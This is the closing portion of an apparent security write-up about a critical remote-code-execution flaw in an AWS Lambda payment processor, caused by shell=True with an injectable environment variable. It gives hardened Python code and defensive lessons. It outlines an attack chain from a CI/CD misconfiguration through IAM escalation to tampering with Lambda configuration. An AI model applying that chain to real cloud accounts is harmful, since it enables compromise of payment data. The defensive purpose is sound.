This was a critical RCE. With these credentials, we could have:

Read, modified, or deleted transaction data from DynamoDB.
Accessed sensitive audit logs from S3.
Pivoted to other AWS services or even internal networks if the role had appropriate permissions.
Deployed further malicious code or backdoors.

The impact was immediate and severe, demonstrating a complete compromise of the core payment processing function.

🛡 Defensive Hardening Blueprint

Remediating this vulnerability requires a multi-layered approach, focusing on secure coding practices, least privilege, and robust configuration management. The primary fix is to eliminate the use of shell=True with dynamically constructed commands and to separate command arguments from the command itself.

Pros Cons

Pros	Cons
Eliminates Command Injection: By passing arguments as a list to `subprocess.run()` and avoiding `shell=True`, shell metacharacters are no longer interpreted. Clear Separation of Concerns: Script path and arguments are distinct, reducing ambiguity. Improved Security Posture: Significantly reduces the attack surface for RCE via environment variables. Minimal Code Change: The core logic remains similar, making it easier to implement. Standard Practice: Aligns with secure coding guidelines for executing external processes.	Requires Code Modification: Not a configuration-only fix; the Lambda code itself needs updating. Potential for Misconfiguration: If `VALIDATION_ARGS` is still poorly managed or contains malicious content, the script might receive unexpected arguments, though RCE is prevented. Increased Complexity for Dynamic Commands: If the original intent was to run highly dynamic, shell-dependent commands, this approach requires refactoring that logic into the application itself or using a safer command parser. Dependency on `shlex`: While standard, it adds a small layer of parsing logic. For truly static arguments, a simple list is even safer.

Eliminates Command Injection: By passing arguments as a list to subprocess.run() and avoiding shell=True, shell metacharacters are no longer interpreted.
Clear Separation of Concerns: Script path and arguments are distinct, reducing ambiguity.
Improved Security Posture: Significantly reduces the attack surface for RCE via environment variables.
Minimal Code Change: The core logic remains similar, making it easier to implement.
Standard Practice: Aligns with secure coding guidelines for executing external processes.

Requires Code Modification: Not a configuration-only fix; the Lambda code itself needs updating.
Potential for Misconfiguration: If VALIDATION_ARGS is still poorly managed or contains malicious content, the script might receive unexpected arguments, though RCE is prevented.
Increased Complexity for Dynamic Commands: If the original intent was to run highly dynamic, shell-dependent commands, this approach requires refactoring that logic into the application itself or using a safer command parser.
Dependency on shlex: While standard, it adds a small layer of parsing logic. For truly static arguments, a simple list is even safer.

Beyond this specific code fix, a comprehensive hardening blueprint would also include:

Least Privilege IAM: Ensure the Lambda's execution role has only the absolute minimum permissions required. For instance, it shouldn't have lambda:UpdateFunctionConfiguration.
Input Validation: Even if environment variables are "trusted," always validate and sanitize any data derived from them, especially if it influences command execution or file paths.
Static Application Security Testing (SAST): Integrate SAST tools into the CI/CD pipeline to automatically detect patterns like subprocess.run(..., shell=True) or dynamic command construction.
Runtime Application Self-Protection (RASP): Consider RASP solutions for critical functions to detect and block malicious command execution attempts at runtime.
Regular Security Audits: Periodically review Lambda configurations, environment variables, and IAM policies.

📖 Lessons From the Field

Here's how the Lambda code and environment variables should be configured:

# transaction_processor_hardened.py
import os
import subprocess
import json
import shlex # For safe splitting of shell-like strings

def lambda_handler(event, context):
    # Retrieve the script path and arguments separately
    # No longer a single 'command_prefix' that can be injected
    script_path = os.environ.get("VALIDATION_SCRIPT", "/usr/bin/python")
    script_args_str = os.environ.get("VALIDATION_ARGS", "/opt/validation_logic.py") # Default arguments

    # Assume 'event' contains transaction data that needs validation
    transaction_data = json.loads(event['body'])
    transaction_id = transaction_data.get('transaction_id', 'UNKNOWN')

    # Safely parse arguments using shlex.split() if they are expected to be shell-like
    # For truly fixed arguments, a simple list is better.
    # Here, we assume VALIDATION_ARGS might contain multiple arguments.
    try:
        script_args = shlex.split(script_args_str)
    except ValueError as e:
        print(f"Error parsing VALIDATION_ARGS: {e}. Using default.")
        script_args = ["/opt/validation_logic.py"] # Fallback to a safe default

    # Construct the full command as a list of arguments
    # This is crucial: subprocess.run with a list does NOT invoke a shell.
    command_list = [script_path] + script_args + ["--transaction-id", transaction_id]
    
    print(f"Executing validation command: {' '.join(command_list)}")
    
    try:
        # SAFE: shell=False (default) when passing a list of arguments
        result = subprocess.run(command_list, capture_output=True, text=True, check=True)
        print(f"Validation output: {result.stdout}")
        return {
            'statusCode': 200,
            'body': json.dumps({'message': 'Transaction validated', 'details': result.stdout})
        }
    except subprocess.CalledProcessError as e:
        print(f"Validation failed for transaction {transaction_id}: {e.stderr}")
        return {
            'statusCode': 500,
            'body': json.dumps({'message': 'Transaction validation failed', 'error': e.stderr})
        }
    except Exception as e:
        print(f"An unexpected error occurred: {e}")
        return {
            'statusCode': 500,
            'body': json.dumps({'message': 'Internal server error', 'error': str(e)})
        }

And the corresponding environment variables:

# Hardened Environment Variables
VALIDATION_SCRIPT="/usr/bin/python"
VALIDATION_ARGS="/opt/validation_logic.py" # Arguments for the script

This approach ensures that the script path and its arguments are treated as distinct elements, preventing shell metacharacter injection. The shlex.split() function is used to safely parse the arguments string into a list, but even better is to provide arguments as separate environment variables if possible, or hardcode them if they are truly static.

This incident, like many others I've encountered over the years, hammered home some critical lessons that often get overlooked in the rush of development:

Environment Variables Are Not Inherently Safe: Trust me, my friends, this is a common misconception. Developers often treat environment variables as a secure, static configuration. But if an attacker gains the ability to modify them (which is a common privilege escalation target), they become a potent vector for injection, RCE, or data exfiltration. Always treat them as potentially untrusted input, especially if they influence command execution.
shell=True is a Red Flag: Any time you see shell=True in Python's subprocess module (or similar constructs in other languages), your security alarms should be blaring. It's almost always a shortcut that introduces significant risk. It means you're handing control to the underlying shell, which will happily interpret any metacharacters an attacker might inject. Prefer passing commands as a list of arguments.
The Chain is Only as Strong as its Weakest Link: Our RCE wasn't a direct hit on the Lambda. It was a chain: a misconfigured CI/CD pipeline led to IAM privilege escalation, which then allowed us to modify the Lambda's environment. Security isn't just about individual components; it's about the entire ecosystem and how they interact. A seemingly minor misconfiguration in one place can unlock critical vulnerabilities elsewhere.
Security by Design, Not by Afterthought: This vulnerability could have been avoided if the design principle of "never trust input" (even configuration input) was applied from the outset. Building security in from the ground up, rather than trying to bolt it on later, is always more effective and less costly. This includes threat modeling, secure code reviews, and automated security testing throughout the development lifecycle.
Assume Compromise: Even with the best defenses, assume an attacker might eventually gain some level of access. This mindset drives you to implement compensating controls like least privilege IAM roles, network segmentation, and robust logging/monitoring, so that even if one component is compromised, the blast radius is minimized and the attack is detected quickly.

This was a critical finding, but it was also a fantastic learning opportunity for the client. It reinforced the importance of looking beyond the obvious attack vectors and understanding the subtle ways configuration choices can lead to catastrophic outcomes. If you're grappling with similar challenges in your cloud environments or want to dive deeper into these kinds of real-world attack scenarios, don't hesitate to reach out. I offer personalized security mentorship sessions and consulting. You can book a 1-on-1 with me, Debasis Bhattacharjee, at thedevdude.com or learnwithdeb.com. Let's secure the digital frontier together.

ID: RTL-2026-001 · Cloud Security · Severity: CRITICAL · 2026-03-13

Open Full Write-up ↗